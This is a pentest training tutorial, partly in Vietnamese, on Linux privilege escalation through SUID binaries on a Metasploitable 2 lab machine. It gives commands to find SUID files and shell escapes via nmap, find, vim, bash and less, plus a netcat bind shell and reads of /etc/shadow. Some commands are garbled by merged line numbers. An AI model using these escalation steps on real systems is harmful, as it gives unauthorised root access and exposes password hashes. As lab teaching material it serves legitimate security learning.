Trên lab Kali hack M2 ta có hướng đánh vài distcc v1 và có shell (1) , sau đó nâng shell lên TTY shell (2)

[1] https://cehvietnam.com/2021/03/04/ceh-v11-oscp-v2-target-metasploitable-2-mot-bai-viet-dai-bai-tap-tong-quat-p2-pentest-distccd-port-3632/

[2] https://cehvietnam.com/2021/03/04/pre-oscpv2-thoat-shell-upgrading-simple-shells-to-fully-interactive-ttys/

Bây giờ là lúc tìm cách leo thang. Hãy tham khảo các bài viết leo thang qua SUID Exe tại đây:

Linux Privilege Escalation using SUID Binaries

hoặc hướng dẫn sau …

SUID (Set User ID) is a type of permission which is given to a file and allows users to execute the file with the permissions of its owner. There are plenty of reasons why a Linux binary can have this type of permission set. For example the ping utility require root privileges in order to open a network socket but it needs to be executed by standard users as well to verify connectivity with other hosts.

However some of the existing binaries and utilities can be used to escalate privileges to root if they have the SUID permission. Known Linux executables that can allow privilege escalation are:

• Nmap
• Vim
• find
• Bash
• More
• Less
• Nano
• cp

The following commands can discover all the SUID executables that are running on the system. More specifically the commands will try to find files in the / directory owned by the user root that have the SUID permission bits, print them and then redirect all errors to /dev/null in order to list only the binaries that the user has permissions to access.

find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \;

All of the binaries above will executed with root privileges since they contain the “s” in their permissions and they are owned by the root user.

12	ls -l /usr/bin/nmap-rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap

Nmap

Older versions of Nmap (2.02 to 5.21) had an interactive mode which allowed users to execute shell commands.  Since Nmap is in the list of binaries that is executed with root privileges it is possible to use the interactive console in order to run a shell with the same privileges.

1

nmap -V

The interactive mode can start by executing Nmap with the parameter “interactive”

1	nmap --interactive

The following command will give an elevated shell.

123	nmap> !shsh-3.2# whoamiroot

Alternatively there is a Metasploit module which performs privilege escalation via SUID Nmap binaries.

1	exploit/unix/local/setuid_nmap

Find

The utility find can be used to discover stored on the system. However it is the ability to execute commands. Therefore if it is configured to run with the SUID permission all the commands  that will executed through find will be executed as root.

12	touch pentestlabfind pentestlab -exec whoami \;

Since the majority of the Linux operating system have netcat installed it is possible to upgrade the elevated command execution into a root shell.

1	find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

Connecting into the opened port will give a root shell.

123	netcat 192.168.1.189 5555idcat /etc/shadow

Vim

The main use of Vim is to be text editor. However if it runs as SUID it will inherit the permission of the root user and therefore it could read all files on the system.

1	vim.tiny /etc/shadow

Further root activities can be done by running a shell through Vim.

1234	vim.tiny# Press ESC key:set shell=/bin/sh:shell

Bash

The following command will open a bash shell as root.

123	bash -pbash-3.2# iduid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

Less

The utility Less can also execute an elevated shell. The same principle applies and for the More command.

12	less /etc/passwd!/bin/sh

Conclusion

Performing privilege escalation by misconfigured SUID executables is trivial. Therefore administrators should evaluate all the SUID binaries and whether they need to run with the permissions of an elevated user. Particular focus should be given to applications with the ability to execute code or write arbitrary data on the system.